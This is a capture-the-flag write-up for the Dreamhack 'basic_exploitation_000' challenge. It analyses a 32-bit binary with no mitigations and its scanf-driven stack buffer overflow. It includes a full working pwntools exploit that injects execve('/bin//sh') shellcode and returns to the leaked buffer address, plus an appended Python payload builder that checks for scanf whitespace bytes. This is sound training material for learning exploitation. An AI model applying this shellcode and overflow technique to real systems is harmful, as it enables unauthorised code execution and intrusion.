Challenge: https://dreamhack.io/wargame/challenges/2
Environment
Ubuntu 16.04
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
- 32-bit binary: addresses are 4 bytes wide
- little endian
- no canary: a stack buffer overflow can overwrite the saved return address without being detected
- NX disabled: the stack is executable, so shellcode placed in the buffer can be run
- no PIE: the binary is loaded at a fixed address (0x8048000); the stack itself is still randomized by ASLR, which is why the program prints buf's address
> none of the usual mitigations is applied
Code Analysis
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);    // unbuffered I/O so the leak arrives immediately
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);                          // 30-second time limit
}

int main(int argc, char *argv[]) {
    char buf[0x80];                     // 128-byte stack buffer
    initialize();
    printf("buf = (%p)\n", buf);        // leaks the stack address of buf
    scanf("%141s", buf);                // reads up to 141 bytes (+ NUL) into a 128-byte buffer: overflow
    return 0;
}
> basic_exploitation_000.c
- buf[0x80]: 128 bytes allocated on the stack
- scanf("%141s"): reads up to 141 characters into buf and appends a terminating NUL, so up to 142 bytes are written
▶ 141 bytes > 128 bytes: the input may be larger than the declared buffer > buffer overflow. The extra bytes are enough to overwrite the saved ebp (4 bytes) and the return address (4 bytes) that sit right above buf (128 + 4 + 4 = 136 ≤ 141).
Trigger
> buf's address changes on every run: ASLR is enabled for the stack, so the address printed by the program has to be read at runtime rather than hard-coded
> sending more than 128 bytes triggers the buffer overflow
Stack Frame
pwndbg> disass main
Dump of assembler code for function main:
=> 0x080485d9 <+0>: push ebp
0x080485da <+1>: mov ebp,esp
0x080485dc <+3>: add esp,0xffffff80
0x080485df <+6>: call 0x8048592 <initialize>
0x080485e4 <+11>: lea eax,[ebp-0x80]
0x080485e7 <+14>: push eax
0x080485e8 <+15>: push 0x8048699
0x080485ed <+20>: call 0x80483f0 <printf@plt>
0x080485f2 <+25>: add esp,0x8
0x080485f5 <+28>: lea eax,[ebp-0x80]
0x080485f8 <+31>: push eax
0x080485f9 <+32>: push 0x80486a5
0x080485fe <+37>: call 0x8048460 <__isoc99_scanf@plt>
0x08048603 <+42>: add esp,0x8
0x08048606 <+45>: mov eax,0x0
0x0804860b <+50>: leave
0x0804860c <+51>: ret
End of assembler dump.
> main function
- buf starts at ebp-0x80 (add esp, -0x80 reserves 128 bytes for it); buffer (128) + SFP (4) = 132 bytes, so the return address sits at buf + 132 and the whole overwrite up to and including it is 136 bytes
Breakpoint 1, 0x080485d9 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*EAX 0x80485d9 (main) ◂— push ebp
*EBX 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
*ECX 0x94609599
*EDX 0xffffd110 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffd1a4 —▸ 0xffffd373 ◂— '/home/minzu/basic_exploitation_000'
*EBP 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0
*ESP 0xffffd0ec —▸ 0xf7c21519 (__libc_start_call_main+121) ◂— add esp, 0x10
*EIP 0x80485d9 (main) ◂— push ebp
───────────────────────[ DISASM / i386 / set emulate on ]───────────────────────
► 0x80485d9 <main> push ebp <_rtld_global>
0x80485da <main+1> mov ebp, esp
0x80485dc <main+3> add esp, -0x80
0x80485df <main+6> call initialize <initialize>
0x80485e4 <main+11> lea eax, [ebp - 0x80]
0x80485e7 <main+14> push eax
0x80485e8 <main+15> push 0x8048699
0x80485ed <main+20> call printf@plt <printf@plt>
0x80485f2 <main+25> add esp, 8
0x80485f5 <main+28> lea eax, [ebp - 0x80]
0x80485f8 <main+31> push eax
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd0ec —▸ 0xf7c21519 (__libc_start_call_main+121) ◂— add esp, 0x10
01:0004│ 0xffffd0f0 ◂— 0x1
02:0008│ 0xffffd0f4 —▸ 0xffffd1a4 —▸ 0xffffd373 ◂— '/home/minzu/basic_exploitation_000'
03:000c│ 0xffffd0f8 —▸ 0xffffd1ac —▸ 0xffffd396 ◂— 'SHELL=/bin/bash'
04:0010│ 0xffffd0fc —▸ 0xffffd110 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
05:0014│ 0xffffd100 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
06:0018│ 0xffffd104 —▸ 0x80485d9 (main) ◂— push ebp
07:001c│ 0xffffd108 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x80485d9 main
1 0xf7c21519 __libc_start_call_main+121
2 0xf7c215f3 __libc_start_main+147
3 0x80484a1 _start+33
────────────────────────────────────────────────────────────────────────────────
Exploit Scenario
shellcode + dummy (132 - shellcode length) + buf address (must be read from the "buf = (...)" line at runtime because of ASLR). Since the input goes through scanf's %s conversion, no byte of the payload may be whitespace (0x09-0x0d, 0x20): scanf would stop reading there and the rest of the payload would never reach the stack.
Exploit
from pwn import *

context.arch = "i386"            # 32-bit target
p = remote('HOST', PORT)         # fill in the challenge host and port

# execve("/bin//sh") shellcode, 26 bytes; it avoids 0x0b (\v), which scanf's %s would treat as whitespace
shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

p.recvuntil(b"buf = (")
buf_addr = int(p.recv(10), 16)   # address of buf leaked by printf("%p"); different on every run (ASLR)

payload = shellcode
payload += b"\x80" * (132 - len(shellcode))   # pad the rest of buf (128) and the saved ebp (4)
payload += p32(buf_addr)                      # return address -> start of buf, where the shellcode sits
p.sendline(payload)
p.interactive()
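As an added example (not code from the post), here is an offline payload builder and checker in plain Python with no pwntools dependency. It assembles the same layout the script above sends, verifies that the return address lands at offset 132, and flags any byte that scanf's %s would treat as whitespace. It also shows why the shellcode increments eax three times instead of using `mov al, 0x0b`: the byte 0x0b is '\v', a whitespace character. The offsets come from the disassembly above; the buf address 0xffffd0ec is a constructed sample, the real one must be read from the program's output at runtime.

```python
import struct

# Offsets taken from the disassembly (lea eax, [ebp-0x80]); the sample buf
# address used below is constructed for this example, not a real leak.
BUF_SIZE = 0x80                    # char buf[0x80]
SFP_SIZE = 4                       # saved ebp between buf and the return address
RET_OFFSET = BUF_SIZE + SFP_SIZE   # 132: distance from buf[0] to the saved return address
SCANF_WIDTH = 141                  # scanf("%141s") stores at most 141 bytes (+ NUL)
SCANF_WHITESPACE = b" \t\n\v\f\r"  # %s stops at the first of these; NUL (0x00) is not a stop byte

# execve("/bin//sh", 0, 0) shellcode from the post, 26 bytes.
SHELLCODE = bytes.fromhex(
    "31c0"          # xor  eax, eax
    "50"            # push eax            ; NUL terminator for the path string
    "686e2f7368"    # push "n/sh"
    "682f2f6269"    # push "//bi"         ; esp -> "/bin//sh\0"
    "89e3"          # mov  ebx, esp       ; ebx = filename
    "31c9"          # xor  ecx, ecx       ; argv = NULL
    "31d2"          # xor  edx, edx       ; envp = NULL
    "b008"          # mov  al, 8
    "404040"        # inc  eax x3         ; eax = 11 (__NR_execve) without emitting 0x0b
    "cd80"          # int  0x80
)

# The same shellcode written the obvious way (mov al, 0x0b): it contains 0x0b == '\v'.
NAIVE_SHELLCODE = SHELLCODE.replace(b"\xb0\x08\x40\x40\x40", b"\xb0\x0b")


def build_payload(buf_addr: int, shellcode: bytes = SHELLCODE) -> bytes:
    """shellcode at buf[0], padding through the saved ebp, then return address = buf_addr."""
    if len(shellcode) > RET_OFFSET:
        raise ValueError("shellcode does not fit below the return address")
    payload = shellcode
    payload += b"\x80" * (RET_OFFSET - len(shellcode))  # rest of buf + saved ebp (value irrelevant)
    payload += struct.pack("<I", buf_addr)               # little-endian 32-bit return address
    return payload


def ret_address_in(payload: bytes) -> int:
    """The 4 bytes of the payload that land on the saved return address slot."""
    return struct.unpack("<I", payload[RET_OFFSET:RET_OFFSET + 4])[0]


def check_payload(payload: bytes) -> list:
    """Reasons scanf("%141s") would not store this payload intact (empty list = OK)."""
    problems = []
    if len(payload) > SCANF_WIDTH:
        problems.append(f"too long: {len(payload)} > {SCANF_WIDTH}")
    for i, b in enumerate(payload):
        if b in SCANF_WHITESPACE:
            problems.append(f"whitespace byte 0x{b:02x} at offset {i}: %s stops reading there")
    return problems


if __name__ == "__main__":
    buf_addr = 0xFFFFD0EC  # constructed sample; take the real value from "buf = (...)"
    good = build_payload(buf_addr)
    print(len(good), hex(ret_address_in(good)), check_payload(good))
    print(check_payload(build_payload(buf_addr, NAIVE_SHELLCODE)))
```

Running it prints 136 bytes with the return address at offset 132 and no problems for the post's shellcode, while the naive variant is rejected because of the 0x0b byte at offset 20. The check is worth keeping in any exploit that goes through scanf %s, since a single whitespace byte in an address or in the shellcode truncates the payload silently.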